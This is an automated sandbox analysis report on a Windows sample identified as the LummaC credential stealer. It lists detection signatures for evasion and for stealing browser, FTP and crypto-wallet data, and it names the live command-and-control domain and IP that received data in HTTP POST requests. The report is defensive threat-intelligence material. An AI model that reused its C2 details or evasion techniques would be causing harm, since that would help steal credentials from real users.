Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:random.exe
Analysis ID:1632155
MD5:7ef195119136bbd7338323363639b91b
SHA1:ef751fa464c872ddfb94e530578ae2d5575ea0ab
SHA256:76f4434753e13ea20f59819a07b45b0b17ca3d01a0b7f403a936178ae8d95d58
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • random.exe (PID: 6660 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 7EF195119136BBD7338323363639B91B)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1408039959.0000000000691000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000003.1378752783.00000000006C1000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.1378704518.00000000006E4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.1378752783.0000000000691000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: random.exe PID: 6660JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T20:07:23.154890+010020283713Unknown Traffic192.168.2.649685188.114.97.3443TCP
            2025-03-07T20:07:26.800874+010020283713Unknown Traffic192.168.2.649688188.114.97.3443TCP
            2025-03-07T20:07:29.941971+010020283713Unknown Traffic192.168.2.649689188.114.97.3443TCP
            2025-03-07T20:07:32.900858+010020283713Unknown Traffic192.168.2.649690188.114.97.3443TCP
            2025-03-07T20:07:36.541678+010020283713Unknown Traffic192.168.2.649691188.114.97.3443TCP
            2025-03-07T20:07:40.038669+010020283713Unknown Traffic192.168.2.649692188.114.97.3443TCP
            2025-03-07T20:07:45.726107+010020283713Unknown Traffic192.168.2.649693188.114.97.3443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: random.exeAvira: detected
            Antivirus detection for URL or domain
            Source: https://begindecafer.world/QwdZdfEMAvira URL Cloud: Label: malware
            Source: https://begindecafer.world/QwdZdflAvira URL Cloud: Label: malware
            Source: https://begindecafer.world/QwdZdfrAvira URL Cloud: Label: malware
            Source: https://begindecafer.world/QwdZdfdAvira URL Cloud: Label: malware
            Source: https://begindecafer.world/QwdZdfmeekAvira URL Cloud: Label: malware
            Source: https://begindecafer.world/QwdZdfAvira URL Cloud: Label: malware
            Source: https://begindecafer.world/7(Avira URL Cloud: Label: malware
            Source: https://begindecafer.world/QwdZdf.Avira URL Cloud: Label: malware
            Source: https://begindecafer.world/Avira URL Cloud: Label: malware
            Source: https://begindecafer.world:443/QwdZdfAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: random.exeVirustotal: Detection: 63%Perma Link
            Source: random.exeReversingLabs: Detection: 47%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49685 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49688 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49689 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49690 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49691 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49693 version: TLS 1.2
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49685 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49689 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49691 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49692 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49690 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49688 -> 188.114.97.3:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49693 -> 188.114.97.3:443
            Source: global trafficHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: begindecafer.world
            Source: global trafficHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=X3wZQoOqj0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14893Host: begindecafer.world
            Source: global trafficHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XIe0Fqie39i1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15084Host: begindecafer.world
            Source: global trafficHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6Zc0vSHm43User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19931Host: begindecafer.world
            Source: global trafficHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3MvThmNLI8SotnUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2336Host: begindecafer.world
            Source: global trafficHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8o7XKa53n6evRUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588088Host: begindecafer.world
            Source: global trafficHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: begindecafer.world
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: begindecafer.world
            Source: unknownHTTP traffic detected: POST /QwdZdf HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: begindecafer.world
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: random.exe, 00000000.00000003.1342030249.00000000051DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: random.exe, 00000000.00000003.1413175912.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501474759.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1432606849.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1411599231.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1407976823.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1412524430.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1500134553.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499918795.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/
            Source: random.exe, 00000000.00000002.1501474759.0000000000700000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1500134553.00000000006FF000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499918795.00000000006F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/7(
            Source: random.exe, 00000000.00000003.1499733536.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501319933.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1413321325.0000000000664000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1341371234.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1407842638.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1432146445.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1462407076.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1311888084.00000000051A1000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1499960717.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1279130057.000000000067B000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1374694609.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1407842638.00000000051AF000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501061112.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/QwdZdf
            Source: random.exe, 00000000.00000003.1499960717.0000000000691000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000002.1501061112.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/QwdZdf.
            Source: random.exe, 00000000.00000002.1501319933.00000000006EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/QwdZdfEM
            Source: random.exe, 00000000.00000003.1499733536.00000000051A2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1432146445.00000000051A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/QwdZdfd
            Source: random.exe, 00000000.00000003.1413321325.0000000000664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/QwdZdfl
            Source: random.exe, 00000000.00000003.1407842638.00000000051A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/QwdZdfmeek
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1374694609.00000000051A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world/QwdZdfr
            Source: random.exe, 00000000.00000003.1432606849.0000000000700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://begindecafer.world:443/QwdZdf
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
            Source: random.exe, 00000000.00000003.1343116416.00000000052B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: random.exe, 00000000.00000003.1343116416.00000000052B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: random.exe, 00000000.00000003.1281832496.00000000051DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: random.exe, 00000000.00000003.1343009956.00000000051DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
            Source: random.exe, 00000000.00000003.1343009956.00000000051DB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: random.exe, 00000000.00000003.1343116416.00000000052B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
            Source: random.exe, 00000000.00000003.1343116416.00000000052B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
            Source: random.exe, 00000000.00000003.1343116416.00000000052B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: random.exe, 00000000.00000003.1374454543.000000000519F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
            Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
            Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49685 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49688 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49689 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49690 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49691 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49692 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49693 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: random.exeStatic PE information: section name:
            Source: random.exeStatic PE information: section name: .idata
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: C:\Users\user\Desktop\random.exeCode function: 0_3_006CD4FB0_3_006CD4FB
            Source: random.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: random.exeStatic PE information: Section: ZLIB complexity 0.9989125259695291
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
            Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: random.exe, 00000000.00000003.1312478277.00000000051B8000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1312314938.00000000051C2000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1281619652.00000000051CB000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1282195685.00000000051AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: random.exeVirustotal: Detection: 63%
            Source: random.exeReversingLabs: Detection: 47%
            Source: random.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: random.exeString found in binary or memory: 3RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNe
            Source: C:\Users\user\Desktop\random.exeFile read: C:\Users\user\Desktop\random.exeJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\random.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: random.exeStatic file information: File size 3056640 > 1048576
            Source: random.exeStatic PE information: Raw size of znhncruu is bigger than: 0x100000 < 0x2b9600

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\random.exeUnpacked PE file: 0.2.random.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;znhncruu:EW;xqkiidkr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;znhncruu:EW;xqkiidkr:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
